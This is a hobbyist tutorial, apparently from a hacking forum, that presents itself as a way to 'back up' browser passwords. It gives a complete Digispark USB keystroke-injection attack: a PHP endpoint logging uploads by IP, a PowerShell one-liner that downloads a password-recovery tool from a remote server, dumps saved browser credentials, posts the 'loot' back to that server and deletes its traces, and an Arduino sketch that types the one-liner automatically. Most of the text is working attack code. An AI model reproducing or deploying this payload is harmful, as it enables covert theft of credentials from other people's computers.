Backing up browser passwords with Digispark
Pointless chapter
Since a lot of people liked my “1$ USB Rubber Ducky alternative” tutorial, I would like to make more “Payload threads” so that the people who missed the original thread could see this and get interested in developing keystroke injection scripts.
Okay okay, I’ll do another one.
Introduction
So imagine you own a lot of computers and you have different passwords saved on them, one day you decided to move all of your passwords to one place.
To do this you would need to go to every computer, download a program, export the passwords and upload them to a flash drive or something.
Well today pikami has a solution for you!
Let’s make a script that does all those things auto-magically!
For the purpose of this tutorial I will not go trough setting up the Digispark dev environment, for that take a look at
1$ USB Rubber Ducky alternative
What exactly are we going to do?
- Setup our web server to save incoming passwords
- Write a script that:
- Downloads a password recovery tool
- Uses the tool to export browser passwords
- Uploads exported passwords back to our server
What you’ll need
- Digispark
- Arduino software
- Web server
The process
Setting up the web server
I’ll assume you already have appache/nginx with php running on your server.
First you have to upload the password recovery tool to your server, for this tutorial we’ll be using WebBrowserPassView by NirSoft (link will be in the bottom of the post)
I downloaded it, named it pw.exe and placed it in the root directory of the server
Let’s create a directory for our password exports
mkdir log
Now let’s make a php upload script that saves all the data it gets to a file:
<?php
$file = "log/" . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>
I copied this script from a Hak5 tutorial (link will be in the bottom ot the post)
The server is now set up
Writing the script for Digispark
Okay so the first thing we need to do is write a powershell script that does what we need So at first the script should go somewhere that it wouldn’t bother the user: windows TEMP directory is a great place
$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir
Then it should create it’s own directory so that it would be easy to clean up after ourselves: “pw” is a perfect name
mkdir pw
cd pw
Now the script shoud download the password recovery tool from our server and use it to export the passwords (the ”| Out-Null” will force the powershell to wait till the execution is finished)
Invoke-WebRequest "https://YOUR_SERVER/f/pw.exe" -OutFile "pw.exe" | Out-Null
.\pw.exe /scomma pw.txt | Out-Null
Then it should upload the loot to our server
Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null
Let’s clean up after ourselves shal we
cd ..
Remove-Item pwd -recurse
Now that we have our script let’s program the Digispark to execute it
#include "DigiKeyboard.h"
void setup() {
// don't need to set anything up to use DigiKeyboard
}
void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);
// Open powershell
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
// Execute code from the interwebs
DigiKeyboard.print("$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;Invoke-WebRequest \"https://YOUR_SERVER/pw.exe\" -OutFile \"pw.exe\" | Out-Null;.\\pw.exe /scomma pw.txt | Out-Null;Invoke-RestMethod -Uri \"https://YOUR_SERVER/upload.php\" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
while(true){
//do nothing
}
}
You have done it
Congratulations! You can now backup the passwords from all those computers you own!
If everything is done correctly your exported passwords should be located on your servers, let’s look at what I got:
Sorry if you wanted to see more, I don’t save passwords in browsers
Final notes
So @KuhakuWolf I hope your happy.
On the real note, I hope you all learned something from this and start developing your own payloads.
I would love to see your creations and as always, if you have any questions just ask, I’ll be happy to help.